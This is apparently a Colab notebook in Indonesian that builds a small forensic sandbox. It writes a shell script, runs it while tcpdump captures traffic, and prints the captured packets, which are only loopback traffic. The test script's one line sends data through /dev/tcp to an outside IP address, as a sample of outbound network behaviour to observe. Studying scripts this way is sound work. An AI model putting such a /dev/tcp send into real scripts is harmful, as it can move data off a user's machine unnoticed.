<a href="https://colab.research.google.com/github/elangbijak4/Security_Research/blob/main/Tool33_2_Almudaya_Forensik_Sandbox_for_sh.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [1]:
import os

# Buat direktori sandbox
sandbox_dir = "sandbox"
os.makedirs(sandbox_dir, exist_ok=True)

In [7]:
# Buat file skrip shell di dalam sandbox
script = """
#!/bin/bash
# Mengirim data ke alamat IP tertentu
echo "Test data" > /dev/tcp/93.184.216.34/80
"""

# Tulis ke file script.sh di dalam sandbox
script_path = os.path.join(sandbox_dir, "script.sh")
with open(script_path, "w") as file:
    file.write(script)

# Berikan izin eksekusi
os.chmod(script_path, 0o755)

In [ ]:
# Instal tcpdump jika belum terpasang
!apt-get install -y tcpdump

In [11]:
import subprocess

# Jalankan tcpdump dan simpan output ke file pcap dan juga ke stdout
tcpdump_process = subprocess.Popen(
    ['tcpdump', '-i', 'any', '-w', 'network_activity.pcap'],
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE,
    text=True
)

# Fungsi untuk menampilkan output tcpdump secara real-time
def stream_output(process):
    while True:
        output = process.stdout.readline()
        if output == '' and process.poll() is not None:
            break
        if output:
            print(output.strip())

# Jalankan fungsi di thread terpisah
import threading
thread = threading.Thread(target=stream_output, args=(tcpdump_process,))
thread.start()

In [12]:
# Eksekusi skrip shell di dalam sandbox
result = subprocess.run(['bash', script_path], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
print("Output:")
print(result.stdout)
print("Error:")
print(result.stderr)

Output:

Error:



In [13]:
# Hentikan proses tcpdump
tcpdump_process.terminate()
thread.join()

# Mengonversi file .pcap ke teks menggunakan tcpdump
!tcpdump -r network_activity.pcap -nn -vv > network_activity.txt

# Baca dan tampilkan konten file teks
with open('network_activity.txt', 'r') as file:
    print(file.read())

reading from file network_activity.pcap, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144
07:41:56.872571 lo    In  IP (tos 0x0, ttl 64, id 53872, offset 0, flags [DF], proto TCP (6), length 75)
    127.0.0.1.34200 > 127.0.0.1.59121: Flags [P.], cksum 0xfe3f (incorrect -> 0x6baf), seq 3225108145:3225108168, ack 2882345868, win 260, options [nop,nop,TS val 2886437037 ecr 2886436402], length 23
07:41:56.913550 lo    In  IP (tos 0x0, ttl 64, id 52094, offset 0, flags [DF], proto TCP (6), length 52)
    127.0.0.1.59121 > 127.0.0.1.34200: Flags [.], cksum 0xfe28 (incorrect -> 0xdb33), seq 1, ack 23, win 260, options [nop,nop,TS val 2886437078 ecr 2886437037], length 0
07:41:56.913569 lo    In  IP (tos 0x0, ttl 64, id 53873, offset 0, flags [DF], proto TCP (6), length 2010)
    127.0.0.1.34200 > 127.0.0.1.59121: Flags [P.], cksum 0x05cf (incorrect -> 0x5450), seq 23:1981, ack 1, win 260, options [nop,nop,TS val 2886437078 ecr 2886437078], length 1958
07:41:56.914102 lo    In  I